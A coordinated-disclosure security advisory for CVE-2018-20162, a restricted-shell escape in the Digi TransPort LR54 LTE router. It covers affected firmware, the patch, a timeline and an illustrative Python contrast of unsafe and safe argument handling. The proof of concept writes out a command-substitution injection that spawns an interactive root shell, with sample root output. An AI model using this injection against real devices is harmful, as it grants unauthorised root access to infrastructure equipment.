Digi TransPort LR54 Restricted Shell Escape Vulnerability

18 Feb 2019 00:00:00 | Reported by Stig Palmquist | Type: zdt | Source: 0day.today

The Digi TransPort LR54 router is vulnerable to a restricted shell escape, allowing unauthorized root access through a Python script and CLI interaction.

CVE-2018-20162: Digi TransPort LR54 Restricted Shell Escape
===========================================================

The Digi TransPort LR54 is a high speed LTE router commonly used by industry,
infrastructure, retail and public transportation.

It supports running python scripts in a restricted sandbox, and has a custom
shell accessible over SSH which is subjected to the same restrictions. The
underlying OS is inaccessible to the administrator.

I've found a way to break out of the sandbox and obtain a root shell by
exploiting the way the CLI handles command line arguments when executing python
scripts:

When an interactive python process receives a SIGINT (through CTRL-C), arguments
to the script are not properly escaped when passed to the interactive CLI's
error logging handler. This allows an attacker to execute arbitrary commands as
root.
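
The bug class described above, as an added example that is not from the
advisory or from Digi firmware: the device's real handler is not public, so the
"echo interrupted:" logger, the function names and the sample arguments below
are assumptions. It contrasts joining script arguments into a shell string with
two safe ways of passing them.

```python
import shlex
import subprocess

# Hypothetical stand-in for an error-logging handler that runs when the
# interactive script is interrupted. It only echoes what it was given.

def log_interrupt_vulnerable(script, args):
    """Flawed: arguments are pasted into one string that /bin/sh parses,
    so command substitution inside an argument is evaluated."""
    cmd = "echo interrupted: " + " ".join([script, *args])
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def log_interrupt_argv(script, args):
    """Hardened: no shell at all; every argument is one argv element
    and is never interpreted."""
    cmd = ["echo", "interrupted:", script, *args]
    return subprocess.run(cmd, capture_output=True, text=True).stdout

def log_interrupt_quoted(script, args):
    """Fallback when a shell cannot be avoided: quote each argument."""
    quoted = " ".join(shlex.quote(a) for a in [script, *args])
    return subprocess.run("echo interrupted: " + quoted, shell=True,
                          capture_output=True, text=True).stdout

# Constructed sample input: a harmless marker instead of a real command.
SAMPLE_ARGS = ["--XXX", "$(echo INJECTED)"]

if __name__ == "__main__":
    for fn in (log_interrupt_vulnerable, log_interrupt_argv, log_interrupt_quoted):
        print(f"{fn.__name__:26s} -> {fn('sleep.py', SAMPLE_ARGS)!r}")
```

In the flawed variant the marker is evaluated by the shell before the logger
sees it; in the other two it reaches the logger as literal text.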

To exploit this vulnerability, an attacker needs to have interactive CLI access
with "super" privileges. A user with this access level is enabled by default on
the device.

Vulnerable
----------
Digi TransPort LR54 (and maybe related products like WR64 and WR54)

Firmware Version : 4.4.0.26 10/29/2018 21:14:06
Firmware Version : 4.3.2.24 09/06/2018 00:58:34

And maybe earlier versions

Mitigation
----------
Users should upgrade to firmware version 4.5.1.4 or newer.

Proof of Concept
----------------
1. Upload sleep.py to the LR54 using scp or sftp, containing:

    import time;time.sleep(10)

2. Execute the following command in the LR54 cli:

    python sleep.py --XXX $(/bin/sh -i >&2)

3. Immediately press CTRL-C after the program starts

4. You are then dropped to an interactive root shell:

    /home/digi/user # uname -a
    Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
    /home/digi/user # id
    uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

Timeline
--------
2018-12-13: Vulnerability discovered
2018-12-14: PoC created, Vendor notified
2018-12-14: Vendor confirmed, 60 day embargo. Applied for CVE.
2018-12-15: CVE-2018-20162 assigned
2018-12-31: Received pre-release firmware. Confirmed not vulnerable.
2019-01-02: Vendor releases fixed firmware 4.5.1.4
2019-01-25: Vendor updated release notes to reference CVE-2018-20162
2019-02-13: Vendor okayed disclosure, embargo lifted

References
----------
https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
https://www.digi.com/resources/security
https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

Credits
-------
Vulnerability discovered by Stig Palmquist.

Thanks to @duniel_pls and @alexanderkjall for reviewing this report.

Scores (18 Feb 2019 00:00, current): Vulners AI Score 0.3 (Low risk) | CVSS 2: 9 | CVSS 3: 9.9 | EPSS: 0.03951